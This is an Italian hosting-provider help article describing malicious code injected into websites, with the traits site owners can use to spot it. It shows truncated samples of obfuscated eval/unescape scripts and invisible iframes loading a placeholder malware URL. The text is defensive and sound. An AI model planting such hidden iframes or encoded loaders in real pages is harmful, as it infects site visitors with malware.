Esempi di codice potenzialmente malevolo

A volte può succedere che, attraverso applicazioni web vulnerabili o furto delle proprie credenziali di accesso al sito, venga inserito nelle pagine web del proprio dominio un codice potenzialmente pericoloso.
Riportiamo di seguito alcuni esempi, non esaustivi, di come si può presentare tale codice:

  • <script>function v47e ...etc... 4950543E'));</script>
  • <iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
  • <script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
  • <!-- ~ --><div style="visibility:hidden"><iframe src="http://url_contenente_malware" width=100 height=80></iframe></div><!-- ~ -->

In genere questi codici hanno una o più delle seguenti caratteristiche :

  • Hanno la proprietà "visibility: hidden" per risultare non visibili nella normale navigazione del sito.
  • Utilizzano una codifica per nascondere il loro contenuto durante la lettura della pagina sorgente.
  • Richiamano pagine esterne ai server Aruba, generalmente pagine che risiedono su server compromessi e contenenti malware.

Lo scopo principale per cui un soggetto può tentare di immettere tali codici in un sito lecito, è la diffusione di malware ai visitatori di tale sito. In pratica, se è presente un codice simile a quelli indicati in precedenza, il browser di un generico visitatore viene reindirizzato sulla pagina esterna richiamata dal codice.
Su tale pagina può essere presente un malware che cerca di installarsi sul computer del visitatore tentando di sfruttare un certo numero di vulnerabilità note.
Se il PC del visitatore non è adeguatamente protetto c'è il concreto rischio che venga infettato.

Nel caso si dovesse individuare sul proprio dominio codice simile a quello indicato, è consigliato seguire le istruzioni dell'articolo
'Cosa fare in presenza di codice malevolo sul proprio sito'.